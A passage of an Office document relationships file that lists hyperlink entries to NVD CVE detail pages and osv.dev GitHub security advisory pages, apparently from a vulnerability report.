Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97243" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97285" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97299" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100260" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100508" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102144" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103241" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103396" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103399" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103476" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103532" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103548" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86778" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92537" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92548" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92872" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93547" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94545" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94673" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97066" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97078" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97249" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97259" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97261" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97282" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97302" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102459" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93460" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93463" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93464" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100272" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100278" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102111" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102140" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97246" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100265" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92899" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100263" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102107" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102581" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47526" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47531" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47562" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100257" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100258" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100259" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100269" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102090" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102122" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102577" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102579" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102584" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102585" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102586" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103118" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103387" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103542" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13719" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88999" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94672" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97074" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97079" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97267" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96825" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102137" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103533" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103436" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101887" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100270" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102138" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100280" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100264" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100271" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102583" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102587" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27085" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102580" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102582" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103114" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103116" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103233" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103012" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103113" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103117" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76144" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103440" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103445" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103585" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103437" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103443" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103444" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103584" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103438" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103439" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100689" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101147" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101148" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101896" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101898" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101899" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101900" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101901" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101902" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101903" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101904" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101905" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101906" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101907" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101908" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101909" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101915" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101916" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101918" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102270" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103500" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19253" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51852" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51853" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51856" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51857" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51858" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51859" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51860" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51861" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51862" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51864" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51866" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51867" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51869" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51870" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51871" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51872" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76169" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80490" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81739" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81809" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84377" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84428" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84469" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84504" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86610" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87970" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87973" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89296" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90776" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90972" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90974" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91776" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91777" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92081" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92172" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92173" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92412" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93981" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96173" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96200" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96255" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-3hv7-mjh2-fv65" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-96h4-vgxj-gvm2" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-9c5c-9qcx-q35q" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-c2m8-h5v5-343r" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-chx6-46f5-w4vp" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-p98j-92pf-mc4p" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-vcvr-r3jv-pc5j" 